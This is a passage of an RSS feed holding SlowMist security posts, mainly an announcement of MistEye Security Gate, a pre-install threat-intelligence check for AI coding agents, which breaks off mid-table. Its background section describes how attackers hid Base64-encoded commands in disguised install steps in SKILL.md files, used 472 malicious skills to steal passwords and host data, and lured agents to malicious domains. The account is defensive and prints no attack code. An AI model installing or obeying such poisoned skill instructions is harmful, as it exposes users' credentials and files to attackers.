0.544px;"><span textstyle="" style="font-weight: bold;">参考资料</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">[1] </span></span><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;"><a href="https://github.com/search?q=A+Gift+From+TeamPCP&amp;type=repositories&amp;s=updated&amp;o=desc" target="_blank">https://github.com/search?q=A+Gift+From+TeamPCP&amp;type=repositories&amp;s=updated&amp;o=desc</a></span></span></b></p></b></b></b></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504920&amp;idx=1&amp;sn=6452ec12fb825b3a0b91ca5be8f009d8&amp;scene=21#wechat_redirect" textvalue="MistEye 安全前置闸门正式发布，筑牢 AI Agent 前置检测防线" data-itemshowtype="0" linktype="text" data-linktype="2">MistEye 安全前置闸门正式发布，筑牢 AI Agent 前置检测防线</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504920&amp;idx=2&amp;sn=476c39eb63c7323cc18604a3ccc5d487&amp;scene=21#wechat_redirect" textvalue="威胁情报｜仿冒 TronLink 的 Chrome 扩展钓鱼攻击分析" data-itemshowtype="0" linktype="text" data-linktype="2">威胁情报｜仿冒 TronLink 的 Chrome 扩展钓鱼攻击分析</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504886&amp;idx=1&amp;sn=6327c2cd38ad036a84e468f938309eb4&amp;scene=21#wechat_redirect" textvalue="慢雾｜RWA 智能合约安全审计服务正式推出" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾｜RWA 智能合约安全审计服务正式推出</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504881&amp;idx=1&amp;sn=8c83bc9f82e684fdb75e04fade95913f&amp;scene=21#wechat_redirect" textvalue="Grok 被利用背后：AI Agent 权限链滥用分析" data-itemshowtype="0" linktype="text" data-linktype="2">Grok 被利用背后：AI Agent 权限链滥用分析</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504861&amp;idx=1&amp;sn=0f71a6b7fafe17ee9cd5e6cf07b83e41&amp;scene=21#wechat_redirect" textvalue="慢雾出品｜链接真实世界资产：从协议族解析到安全实践" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾出品｜链接真实世界资产：从协议族解析到安全实践</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021118" data-ratio="3.9814814814814814" data-s="300,640" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8009a386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=8f1fa0a8&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504936%26idx%3D1%26sn%3D8a8f48e910d76f27242fb43e14c45590">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 13 May 2026 15:52:00 +0800</pubDate>
    </item>
    <item>
      <title>MistEye 安全前置闸门正式发布，筑牢 AI Agent 前置检测防线</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504920&amp;idx=1&amp;sn=6452ec12fb825b3a0b91ca5be8f009d8</link>
      <description>MistEye Security Gate 专注依赖于安装前的安全检查，通过硬阻断逻辑和全量覆盖率门限，为 AI 代理的依赖安全提供可靠的前置防线。</description>
      <content:encoded><![CDATA[<p>原创 <span>慢雾安全团队</span> <span>2026-05-09 18:46</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=8ac91620&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCJuGdUvnp9glelKZYrX9J0lnd2GIRyjAicqUVyol4F1Czfss9yksNlWODWSMypRRaGmZC49pqvIQtkoKUWLa5OGFsm3JFMUFWx0%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>MistEye Security Gate 专注依赖于安装前的安全检查，通过硬阻断逻辑和全量覆盖率门限，为 AI 代理的依赖安全提供可靠的前置防线。</p>
  <p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">慢雾安全团队正式发布 MistEye Security Gate（安全前置闸门技能），为 Claude Code、Cursor、OpenAI GPT 等主流 AI 编码代理提供</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">先检测、后执行</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">的依赖安装与域名访问前置安全检测能力，覆盖供应链投毒、恶意外链及第三方 Skill/MCP 安装三大核心风险场景。</span></span></p><p><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="2 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye Security Gate 开源地址：</span></span><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">github.com/slowmist/misteye-skills</span></span></span></b></p></b></b></p></b></b></b></b></b></p><p><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h2 dir="ltr" style="line-height:1.38;margin-top:18pt;margin-bottom:4pt;"><span style="white-space:pre-wrap;font-size:17pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><span textstyle="" style="font-size: 24px;">一、背景：AI 代理的技能生态与供应链风险</span></span></span></h2></b><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">随着 Claude Code、Cursor、Codex 等 AI 编码工具的快速普及，&#34;Skill&#34;和&#34;MCP（Model Context Protocol）&#34;已经成为开发者日常工作中不可或缺的能力扩展方式。通过在项目中声明 .claude/settings.json 或安装第三方 Skill 仓库，AI 代理可以获取浏览器操控、文件编辑、数据库查询等扩展能力。</span></span></p></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">然而，这种生态的开放特性也带来了显著的安全挑战：</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">供应链投毒</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：第三方 Skill 或 MCP 所依赖的 Python/Node.js/Go 包可能被恶意篡改，引入后门。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意外链：AI 代理在执行任务时可能被诱导访问钓鱼网站或恶意域名。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">权限滥用：未经验证的 Skill 可能读取敏感文件（如 ~/.ssh、~/.aws）、外发数据或执行任意命令。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2026 年 2 月，慢雾安全团队发现 OpenClaw 的插件中心 ClawHub 正遭受大规模供应链投毒攻击：攻击者通过在 SKILL.md 文件中伪装&#34;依赖安装/初始化&#34;步骤，利用 Base64 编码隐藏恶意命令，实施两段式攻击链路。安全扫描识别出 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">472 个恶意 Skill</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，这些恶意程序会钓取用户密码、收集主机信息和文档、将数据上传至攻击者服务器，相关基础设施与 Poseidon 黑客组织存在关联（详见</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><a class="normal_text_link" target="_blank" style="text-decoration: none;color: rgb(87, 107, 149);" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504299&amp;idx=1&amp;sn=db6de07e052089ee9893f2ffbd96eb7f&amp;scene=21#wechat_redirect" textvalue="" linktype="text" data-linktype="2"><span textstyle="" style="color: rgb(87, 107, 149);font-weight: normal;">《慢雾：ClawHub 正逐渐成为攻击者实施供应链投毒的新目标》</span></a></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">）。随后在 3 月，慢雾进一步监测到攻击升级——攻击者通过已泄露的 GitHub 凭据以开发者身份登录 ClawHub，发布含后门的恶意 Skill，形成从凭据窃取到供应链投毒的完整攻击链。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">慢雾安全团队基于对 AI 代理安全威胁的持续跟踪，将 MistEye Security Gate 定位为 AI 代理执行链路中的</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">前置安全闸门</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，确保每一个依赖安装、每一次域名访问都经过实时威胁情报检测。</span></span></p><b data-pm-slice="0 0 []"><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 4pt;"><span leaf="" style="white-space: pre-wrap;font-size: 17pt;font-family: Arial, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">二、核心能力：先检测，后执行</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye Security Gate 的核心</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">设计理念是一个简单但严格的原则：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在任何高风险操作执行之前，必须先通过 MistEye 威胁情报 API 的实时检测</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。如果 API 返回恶意结果，操作将被硬阻断，从源头切断风险。</span></span></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.1 三大检测场景</span></span></h3></b><table><tbody><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">场景</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">触发条件</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">检测内容</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">依赖安装前检测</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">AI 代理执行 pip install、npm install 等命令前</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">扫描 